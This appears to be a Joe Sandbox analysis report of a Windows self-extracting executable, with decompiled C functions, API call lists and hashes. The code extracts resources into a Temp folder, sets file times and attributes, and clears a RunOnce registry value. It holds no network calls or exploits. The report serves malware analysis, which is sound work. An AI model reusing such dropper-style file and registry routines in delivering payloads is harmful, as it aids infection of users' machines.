                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F4D,?,00000002,00000000), ref: 00A65201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A65250
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: fc134a25c64679ebd6dbb10288dcf541a823cb53a9f2b6522cb5ca7836b5cbf0
                                                                                                                                                                                                      • Instruction ID: 3090065142a453265503290ba6cf1d7350915bff12c7bd092ec1ba48ab200630
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc134a25c64679ebd6dbb10288dcf541a823cb53a9f2b6522cb5ca7836b5cbf0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA1104F1A00601BFE355ABB15D5AF7B65BEEB99384F104429F702E6290DFB98C024534
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A61FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xa68530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A6538C,?,?,00A6538C), ref: 00A62005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(00A6538C,wextract_cleanup3,?,?,00A6538C), ref: 00A62017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00A6538C,?,?,00A6538C), ref: 00A62020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 849931509-2968168367
                                                                                                                                                                                                      • Opcode ID: af18461bee53bb5df4077f0b03026099599d1a5542763d1c587417eafae11e15
                                                                                                                                                                                                      • Instruction ID: 70aaf9f4ee591d35df7d9c007c8c23835fcb7d922630cb3831ef461ce37e5d8c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af18461bee53bb5df4077f0b03026099599d1a5542763d1c587417eafae11e15
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8E04F30655319BBD721CBD0EC0AF597B3DF710741F110295F906B0060EBA55E15DB05
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A64CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xa691d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E00A64E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E00A66CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xa68584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xa691e4;
                                                                                                                                                                                                      						_t58 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xa691e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xa691e4;
                                                                                                                                                                                                      						_t30 = E00A64702( &_v268, 0xa691e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E00A6476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E00A64980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00A647E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa693f4 =  *0xa693f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xa691e4;
                                                                                                                                                                                                      						_t63 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xa691e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xa691e4;
                                                                                                                                                                                                      						_t30 = E00A64702( &_v268, 0xa691e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E00A64C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00A64B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E00A64B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x00a64d84
                                                                                                                                                                                                      0x00a64d89
                                                                                                                                                                                                      0x00a64d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d94
                                                                                                                                                                                                      0x00a64d99
                                                                                                                                                                                                      0x00a64d9e
                                                                                                                                                                                                      0x00a64da1
                                                                                                                                                                                                      0x00a64daa
                                                                                                                                                                                                      0x00a64daa
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64da3
                                                                                                                                                                                                      0x00a64db5
                                                                                                                                                                                                      0x00a64dbb
                                                                                                                                                                                                      0x00a64dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64dc3
                                                                                                                                                                                                      0x00a64dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64dc5
                                                                                                                                                                                                      0x00a64dbd
                                                                                                                                                                                                      0x00a64d2a
                                                                                                                                                                                                      0x00a64d2a
                                                                                                                                                                                                      0x00a64d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64d2d
                                                                                                                                                                                                      0x00a64cf8
                                                                                                                                                                                                      0x00a64cfd
                                                                                                                                                                                                      0x00a64d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A64DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A64DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-3249786385
                                                                                                                                                                                                      • Opcode ID: ac61d37cc1e0ff7ef9fde262027b3d4c58c58da2173f50be7855dc6cafdbb582
                                                                                                                                                                                                      • Instruction ID: d4260747a30f17fb908bf107497f37d58fc50f3a3c76a05cfd586ac28385e51d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac61d37cc1e0ff7ef9fde262027b3d4c58c58da2173f50be7855dc6cafdbb582
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50414736A00201DBCB219F38DE44AF677B9FB4E700F144668E89297685DF32DE8AC750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xa68d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xa68d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A64C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A64C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A64C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 4f18307746697e6a47be308f1d231009a7855e347dc659af0e0d3888d436052d
                                                                                                                                                                                                      • Instruction ID: 6fec6ebc6c363d6ac96f7bb2633f5e3378cd8f3b15c76ece4d6210acc24e37d3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f18307746697e6a47be308f1d231009a7855e347dc659af0e0d3888d436052d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0907260120CAFDB64DFB4CC48DBB7BBCEB18240B44062BE815D1150EA70D914CBB0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A6487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A6490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A64A23,?,00A64F67,*MEMCAB,00008000,00000180), ref: 00A648DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A64F67,*MEMCAB,00008000,00000180), ref: 00A64902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 9e24636df27940980c5e4af5113c31c5219afb476769fe699c6c46cdd4764161
                                                                                                                                                                                                      • Instruction ID: 24fa550d650e2d4043ab4cb235abc99380513a249dd553b47df85f7a312ed4b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e24636df27940980c5e4af5113c31c5219afb476769fe699c6c46cdd4764161
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88014BA3E5157026F32481694C88FB7596CCBAAB34F1B0334FDAAE71D1D5644C0481E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A64AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xa6858c; // 0x268
                                                                                                                                                                                                      				_t9 = E00A63680(_t20);
                                                                                                                                                                                                      				if( *0xa691d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xa68d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xa69400; // 0x58b60
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xa69400 = _t15;
                                                                                                                                                                                                      							if( *0xa68184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xa68584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa693f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A63680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A6369F
                                                                                                                                                                                                        • Part of subcall function 00A63680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636B2
                                                                                                                                                                                                        • Part of subcall function 00A63680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A64B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 4bb7f10b6b1490443d3d352b7d50bf81d0859af5ff027e1c5dbbfe55754d2720
                                                                                                                                                                                                      • Instruction ID: db9e120a67dfbce059feb38d9f7ab1b7d21d6accc8c4362fa9872f009ce0fc74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bb7f10b6b1490443d3d352b7d50bf81d0859af5ff027e1c5dbbfe55754d2720
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2014071240215ABDB14CFA9DC15BA6777DA748725F148325FA39971E0CBB0D812CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A6658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
